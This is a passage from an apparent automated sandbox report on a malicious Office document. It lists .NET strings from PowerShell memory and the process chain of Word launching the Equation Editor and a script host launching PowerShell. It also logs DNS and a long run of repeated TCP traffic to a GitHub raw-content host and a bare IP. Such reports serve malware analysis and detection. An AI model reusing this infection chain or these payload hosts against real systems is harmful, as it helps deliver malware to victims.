Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: global trafficDNS query: name: raw.githubusercontent.com
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
